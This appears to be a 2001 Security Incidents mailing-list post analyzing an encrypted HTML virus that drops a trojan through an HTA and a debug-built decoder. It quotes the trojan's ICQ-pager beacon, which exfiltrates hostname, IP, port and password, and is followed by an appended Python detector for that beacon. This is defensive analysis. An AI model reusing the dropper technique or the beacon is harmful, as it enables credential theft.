Security Incidents mailing list archives
Re: encrypted html based virus
From: Dzzie Z <dzzie () YAHOO COM>
Date: Thu, 18 Jan 2001 20:15:31 -0500
hats off to whoever made this originally :) it is a pretty neat flow of events here....the whole thing is a masterpiece... webpage decodes actual malicious commands, refreshes browser to run page's new content, browser executes new code and writes hta, on reboot(?) hta goes into effect..(unless somehow that long non-ascii string overflows a buffer..there was a package named godmessage a while back that worked like this on a couple ActiveX controls...humm wonder)

-the classID in the decoded page maps to: "Object for constructing type libraries for scriptlets" inprocserver= C:\WINDOWS\SYSTEM\SCROBJ.DLL ( anyone know anything more about this dll? )

so the hta first writes xxdecode.src which looks like assembler commands, runs it through debug to turn it into machine code (xxdecode.com), writes an encoded file and decodes it with its own com decoder to create a live exe... I am amazed they could squeeze all that functionality into a html scripting exploit...i wonder why they didn't just disassemble the exe they were after and run that through debug? does uuencode compress? bet this probably comes from a wrapped hack program...probably from TLsecurity thinking back to the title in the decoded web page...going to have to root around and see if I can find it

the exe looks like a trojan...contacts someone through their icq pager:

q.com.GET./scrip ts/WWPMsg.dll?fr om=Asylum&fromem ail=Asylum&subje ct=%s&body=hey+t here,+ive+been+c ommitted...+[nam e=%s]_[hostname= %s]_[ip=%s]_[por t=%s]_[password= %s]_[version=0.1 .3]_[winver=%s]& to=%s.HTTP/1.0.. .....abcdefghijk lmnopqr.36063200 ...%s\%s.winpcf3 2.exe.%s\system. ini.%s\win.ini.e xplorer.exe.%s.b

wish I had a junk drive to run it on so I could grab the packets :) thanks for sharing :) techniques like this just expand thought sooo much...I can't imagine how long it took to develop this...the debug trick is beautiful...the only other place I have seen that is in an old school bat file --> com maker....

when I went to check the base href in the original file...it gave me a crash page...lots of con\con and nul\nul imgs and other scripting tricks... but I looked into the server and they are a free web host with cgi scripting...so probably just a rogue user name "theproxyjudge" over a compromised system. if this was an overflow of an old ActiveX control buffer it is likely to have been pre IE5(?) so they might have given me a page to fit to my browser version...
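The beacon format quoted in the post (a GET to /scripts/WWPMsg.dll whose body parameter carries [name=..]_[hostname=..]_[ip=..] fields) is the kind of indicator a defender would want to pull out of proxy or IDS logs rather than from packets off a "junk drive". The following Python is an added example and is not code from the original post, the list, or the trojan's author; the request lines it scans are constructed for illustration, and parse_beacon and scan_request_lines are hypothetical names chosen here.

```python
"""Flag HTTP request lines matching the WWPMsg.dll beacon format quoted in the post.

Added example, not from the original post. The sample request lines below are
constructed; the path and field names come from the strings dump in the post.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Path of the ICQ web-pager CGI the dumped strings show the trojan calling.
BEACON_PATH = "/scripts/WWPMsg.dll"

# The body parameter packs victim details as [key=value] pairs joined by '_'.
FIELD_RE = re.compile(
    r"\[(name|hostname|ip|port|password|version|winver)=([^\]]*)\]"
)

# Minimal HTTP/1.x request-line parser: "METHOD target HTTP/x.y".
REQUEST_LINE_RE = re.compile(
    r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<ver>\d\.\d)$"
)


def parse_beacon(request_line):
    """Return the beacon's fields as a dict if request_line matches, else None."""
    m = REQUEST_LINE_RE.match(request_line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.lower() != BEACON_PATH.lower():
        return None
    # parse_qs turns '+' into spaces and keeps empty values (e.g. "to=").
    qs = parse_qs(parts.query, keep_blank_values=True)
    body = qs.get("body", [""])[0]
    fields = dict(FIELD_RE.findall(body))
    # A plain pager message to WWPMsg.dll is benign; the packed victim fields
    # in the body are what distinguish the trojan's check-in.
    if "hostname" not in fields and "ip" not in fields:
        return None
    return {
        "from": qs.get("from", [""])[0],
        "to": qs.get("to", [""])[0],
        "subject": qs.get("subject", [""])[0],
        **fields,
    }


def scan_request_lines(lines):
    """Return (line_number, fields) for every line that parses as a beacon."""
    hits = []
    for idx, line in enumerate(lines, start=1):
        fields = parse_beacon(line)
        if fields is not None:
            hits.append((idx, fields))
    return hits


# Constructed sample log: one benign request, one beacon in the quoted format,
# one request to the same CGI that carries no victim fields.
SAMPLE_LOG = [
    "GET /index.html HTTP/1.0",
    "GET /scripts/WWPMsg.dll?from=Asylum&fromemail=Asylum&subject=box1"
    "&body=hey+there,+ive+been+committed...+[name=box1]_[hostname=pc1]"
    "_[ip=10.0.0.5]_[port=1234]_[password=example]_[version=0.1.3]"
    "_[winver=Win98]&to=12345678 HTTP/1.0",
    "GET /scripts/WWPMsg.dll?from=someone&to=12345678&body=hi HTTP/1.0",
]

if __name__ == "__main__":
    for line_no, fields in scan_request_lines(SAMPLE_LOG):
        print(f"line {line_no}: beacon from {fields['hostname']} "
              f"({fields['ip']}:{fields['port']}) to ICQ {fields['to']}")
```

The check keys on the packed [hostname=..]/[ip=..] fields rather than on the CGI path alone, so ordinary web-pager traffic to the same endpoint is not flagged; the password field is recorded only so an analyst can see that the implant ships it in the clear.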